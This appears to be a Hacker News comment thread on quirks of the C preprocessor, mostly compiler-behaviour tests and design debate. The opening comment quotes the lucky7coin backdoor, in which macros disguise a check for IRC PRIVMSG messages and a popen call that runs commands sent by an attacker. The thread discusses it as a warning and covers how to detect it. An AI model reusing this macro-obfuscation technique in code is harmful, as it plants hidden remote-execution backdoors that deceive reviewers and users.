Scandalous Weird Old Things About the C Preprocessor

pjc50 · on Jan 21, 2016

The C preprocessor is a horrendous way of doing metaprogramming that was implemented because it was relatively easy to do as a separate pass. There's a reason why very few other languages have done it this way.

A good knowledge of the preprocessor is essential for writing obfuscated and underhanded C. For example, the lucky7coin backdoor: https://github.com/alerj78/lucky7coin/issues/1 where the code

  if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");

expands to

  if (vWords[1] == "PR" "IV" "M" "SG" && vWords[3] == ":!" && vWords[0].size() > 1)
  {
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");

DSMan195276 · on Jan 21, 2016

IMO, whether or not the C preprocessor is good depends on what you're trying to do and how you do it. I doubt there are any preprocessors or macro systems that can't be used to obfuscate code - That's basically the definition of what they do, modify your code before you compile it. Obviously, and strange/unexplained preprocessor usage should be examined and preferably removed.

The example you gave is not really fair though, because it seems pretty obvious to me that nobody ever looked at that code - it hardly matters they hid the backdoor in the the C pre-processor. If you take a look at the repo, it only has three commits - With the first one (https://github.com/alerj78/lucky7coin/commit/07d7e5fc53e5673...) being a supposed import of the code from the repo it used to exist in, and it's in this commit where the backdoor was inserted. The real issue is that people were running code from someone who appears to be a complete unknown, has no history for his code, and just assumed it was the same as the old code without checking.

mrbrowning · on Jan 21, 2016

Preprocessors are uniquely problematic in this regard, though, since they're just simple text-substitution engines. Things like templating (as in C++), in-language macros (as in Lisp variants), or language-level metaprogramming facilities (as in Ruby, Python, ...) all have access to actual entities in the language, which constrains their effects in a way that's safer and easier to reason about.

DSMan195276 · on Jan 21, 2016

I'm not looking to deny that straight text-substitution has it's drawbacks, you're completely right. But that being said, I still don't see it as big of a deal as it seems. Generally speaking, bad/malicious pre-processor abuse like this sticks out like a sore thumb when you're reviewing code. If you don't have anybody reviewing the code then it doesn't really matter how you disguised it. At least with the C preprocessor, if there's something you're unsure about, you can run the preprocessor separately and look at the output, clearing up all doubt over what it does.

Also worth noting, one of the nicer things about the design of the C preprocessor is that it can be applied to a lot of different file-types. In more complicated low-level C projects, you can run the preprocessor over your C code, assembly code, linker scripts, etc.. which is a huge gain since you can have access to all your constants and simple macros, simplifying work and duplication. You can't get that with something tied to the language - Which is unfortunate, because like you said it's better to avoid the preprocessor, since writing things on the language-level makes them much easier to reason about.)

kuschku · on Jan 21, 2016

Even in Java – this is something next to no one knows – you can use metaprogramming and get the full AST, which you can then manipulate at will.

caf · on Jan 22, 2016

It seems to me that you could create something at least this devious using C++ templates and operator overloading. I wouldn't bet against it in the other languages you mention, either.

yid · on Jan 21, 2016

This is so absurdly simple and yet devastating. Reading some of the comments on the Github issue you posted, this stood out (I don't know anything about lucky7coin):

> So disappointing such code was not reviewed by Vern and team before running it on the server where damage could result.

So this code was actually put into production somewhere at some point -- wow. And cursory code review and compiling from source will do absolutely nothing here.

mitchty · on Jan 21, 2016

This is why you dump out source after the preprocessor has had its way with it.

gcc -E somethinghokey.c | less

The only thing you could hope to do would be to look for PRIVMSG in the binary after compiling or to look at the file post preprocessor.

pjc50 · on Jan 21, 2016

That often expands into hundreds of thousands of lines though. It's more routine to go backdoor-hunting in binaries; you've given me the interesting idea of running `strings` on the binary and looking for anything that's not in the source.

daurnimator · on Jan 21, 2016

Watch out for running `strings` on untrusted input!

See e.g. https://lcamtuf.blogspot.com.au/2014/10/psa-dont-run-strings...

kayamon · on Jan 22, 2016

This makes me sad. Literally the whole point of 'strings' is for poking around in unknown files, and they managed to break even that.

AstralStorm · on Jan 22, 2016

Instead, do it like a pro and run it from a live CD or a throwaway VM. Any work on untrusted code should be done in an trust-reduced environment.

kazinator · on Jan 21, 2016

Even if you limit yourself to a purely textual pass, you can implement much better preprocessing.

petke · on Jan 22, 2016

Exactly. If the preprocessor respected file scope or better yet namespace scope it would be much much better. The way it works now there is no encapsulation. preprocessor definition in one library header will inadvertently affect code in other libraries, depending on the order in which they happen to be included and compiled. Its such a mess its embarrassing we still put up with it in the year 2015.

kazinator · on Jan 22, 2016

In 1999 or so I tried to write a better macro preprocessor. I called it MPP. Here it is, via the Wayback Machine

https://web.archive.org/web/20070209223522/http://users.foot...

Oh, I have the sources. I haven't lost anything. Why I don't host that project anywhere is that I'm not all that proud of it.

I worked for one startup some almost years ago whose guys looked at that thing before they hired me and liked it.

MPP has namespaces, and it also tries to preserve whitespace (expansions occurring at some indentation level are indented). It could be used for Python, in theory.

Thinking along those lines, I posted to a Python newsgroup around then: reactions were mixed:

http://code.activestate.com/lists/python-list/9193/

:)

nly · on Jan 21, 2016

Nothing a pass through -E and clang-format wouldn't reveal.

evmar · on Jan 21, 2016

Here's one I recently learned about:

http://reviews.llvm.org/D15866

    #define FOO
    #define BAR defined(FOO)
    #if BAR
    ...
    #else
    ...
    #endif

clang and gcc will pick the #if branch while Visual Studio will take the #else branch.

rootbear · on Jan 21, 2016

Interesting. I don't think I ever tried to use a macro in the conditional expression of a #if, except inside a defined() or undef(). From my time on the C committee, I recall that the preprocessor was a royal pain to get right. It has it's own set of token rules that aren't the same as C itself, for example.

I am also reminded of the button I used to have that said, "Defining define is undefined."

random_upvoter · on Jan 22, 2016

There are quite a few differences between msvc and the other compilers. For instance:

  #define a(x,y) x+y
  void f(int i)
  {
      a(i,+);
  }

will compile without errors with cl but not with any other compiler.

nkurz · on Jan 21, 2016

This doesn't seem quite right. Did you maybe mean "#undefine FOO" or "! defined(FOO)"? Whether BAR gets expanded or not, in your example it looks like it would always evaluate true. Or am I misunderstanding the ambiguity?

It might be telling that I also don't understand the Clang bug report as written. I think there are typos in the examples. Is the switch from "HAVE_FOO_BAR" to "HAVE_FOO" in the first example intentional? Is the construct "#defined" (with a final 'd') intentional in the second?

evmar · on Jan 21, 2016

I'm not sure -- I'm going off what the Clang bug says. They have a spec ref in there. (Note that you can't trust your intuition on how compilers work, you can only trust the spec and experiments.)

If it helps any here is the real-world code where this problem came up:

https://codereview.chromium.org/1584203002/

Edit: another reference: https://gcc.gnu.org/onlinedocs/cpp/Defined.html#Defined "If the defined operator appears as a result of a macro expansion, the C standard says the behavior is undefined."

nkurz · on Jan 21, 2016

OK, I've now tested. For this test code:

  #define FOO
  #define BAR defined(FOO)
  #if BAR
  #error "true"
  #else
  #error "false"
  #endif

Clang, GCC, and ICC evaluate the "true" branch, while MSVC evaluates the "false" branch.

For the same test code with first line changed to "undef":

  #undef FOO
  #define BAR defined(FOO)
  #if BAR
  #error "true"
  #else
  #error "false"
  #endif

MSVC, Clang, GCC, and ICC all agree on "false".

Importantly, though, when used with "/Wall", MSVC gives this error message in both cases:

  main.cpp(3): warning C4668: 'definedFOO' is not defined as
     a preprocessor macro, replacing with '0' for '#if/#elif'

None of the other three compilers give any warnings even with '-Wall -Wextra -pedantic". So there definitely is a difference in behavior, but I don't think it's actually the one that's presumed in that bug.

For further experimentation, Clang, GCC, and ICC can be tested online here: http://gcc.godbolt.org/

And MSVC can be tested online here: http://webcompiler.cloudapp.net/

bla2 · on Jan 22, 2016

According to the link posted by evmar, clang warns on this starting at r258128.

cremno · on Jan 21, 2016

There are also so-called computed includes (IB instead of UB though):

https://gcc.gnu.org/onlinedocs/cpp/Computed-Includes.html

    #define SYSTEM_H "system_1.h"
    ...
    #include SYSTEM_H

cyphar · on Jan 22, 2016

That just looks like a Visual Studio bug to me.

speeder · on Jan 21, 2016

STTLPORT (4.6 at least... don't checked 5.x) has lots, lots of these... I wonder how it don't crap out completely O.o

colanderman · on Jan 22, 2016

#2 is incorrect. Being sensitive to line breaks does not make a grammar context-sensitive. It just means you have to treat line breaks as tokens rather than ignorable whitespace (which is exactly what the context-free grammar given in the C11 standard does).

Same with the bit about concatenating tokens. Every single one of those examples has a static parse tree, which, for the C preprocessor, is a sequence of tokens and directives. The author seems to be confusing the preprocessor's parse tree with the effect it has on the underlying text.

(Yes, the output of the preprocessor is dependent on what you define, but that has nothing to do with the grammar. What the author claims is like saying a Lisp is context-sensitive because the factorial function produces a different values for different inputs!)

Now, if you could do this:

    #define foobar define
    #foobar x 123
    x

and get "123", that would be a context-sensitive grammar. But that is NOT a thing you can do!

breadbox · on Jan 22, 2016

I hate to say it, but I was rather unimpressed by this list, and nothing in it surprised me. While I certainly agree that the C preprocessor is a relic, and has not weathered the test of time well, I would suggest that a number of the supposed infelicities mentioned in this article stem from the misleading idea that the preprocessor is an integral part of the C language proper, when it is better thought of as its own language (and one that was traditionally done by a completely separate program). The preprocessor does things differently than the rest of C, because it's not C. It is a text-processing language of convenience, provided specifically for doing things that C itself cannot (or should not) do.

robertelder · on Jan 22, 2016

I'll try harder next time.

TazeTSchnitzel · on Jan 21, 2016

Relatedly, C is a purely functional programming language:

http://conal.net/blog/posts/the-c-language-is-purely-functio...

pklausler · on Jan 21, 2016

I've written a C preprocessor and I agree that the language standard documents are ambiguous and incomplete. The best I could do was hack on it until it matched GCC's preprocessor well enough to compile Linux.

I don't recall all the horrid details, but one case that I do remember driving me nuts was the use of #if/#endif in the argument to a function-like macro.

DubiousPusher · on Jan 21, 2016

Has there been any notion of a replacement Meta/Macro language for C? Something open source. Of course pre-preprocessing one's files and the complexity that might add to the build system are unattractive but I'd still be interested if someone has attacked this problem.

ArkyBeagle · on Jan 21, 2016

Much of what makes 'C' annoying can be made less painful by referring to static/const struct tables/arrays. Those are a prime candidate for generation.

You don't have to keep the preprocessing of files as part of the mainline build, but there's something to be said for it - sort of "make GENERATE_ALL_THE_THINGS" might run the preprocessing { Python/Tcl/Perl/bash/even 'C' } scripts for you.

If the generators just emit .h files, that can be pretty good. You're still left with something #ifdef-ey to select them, based on #defines or -D options.

You might even go so far as to dynamically load these tables if that can make sense. The ld linker can directly link in blobs.

pcwalton · on Jan 21, 2016

The module and template features (along with static if, if the committees figure out what to do in that area) in the newest versions of C++ together get pretty close to replacing the C preprocessor.

ArkyBeagle · on Jan 21, 2016

Static if can be ( crudely ) synthesized today.

ctstover · on Jan 21, 2016

My school of thought would be to limit it to just #include, #if, #else, #end, and non-recursive single word only #define / #undef. Force everything to be 1 per single line, and call it a day.

Macros should always be the absolute last resort to doing anything. Stepping through code in gdb with some "creative" macro-based API is almost as bad as C++.

ArkyBeagle · on Jan 21, 2016

I've seen 'C' macros used to do template-ey things that probably reinforced the readability of the code ( once you get used to the fact that the macros were there at all ) .

More modern compilers allow using non-static "const" constructs to do much of the same, which is a great improvement.

To wit:

#define in_bounds(lower,x,upper) ((x <upper) && (x >lower))

vs. const bool in_bounds = ((x > lower) && ( x < upper ));

Macros can be used effectively for reduction in strength, so long as you're not too clever about it.

DubiousPusher · on Jan 21, 2016

You'll forgive me if my knowledge is a bit dated. I largely work on tools integration these days and don't do much in the way of framework development but aren't macros pretty much the defacto way of doing reflection/rtti. Actually, almost every mature framework I've worked with in the past used macros to markup class properties, register types, etc.

cyphar · on Jan 22, 2016

I'm 95% sure the last example in #3 is undefined behaviour. #(a b c) is not valid, so evaluating it with multiple levels of indirection probably is a compiler bug for not erroring out.

cyphar · on Jan 22, 2016

And the last 3 or 4 are odd, but are required for some of the hacks required in the early days of C (and some are almost certainly used in the Linux kernel source today).

biot · on Jan 21, 2016

Kind of click-baity, no? Though the title is missing "You won't believe what happens next... developers hate it!"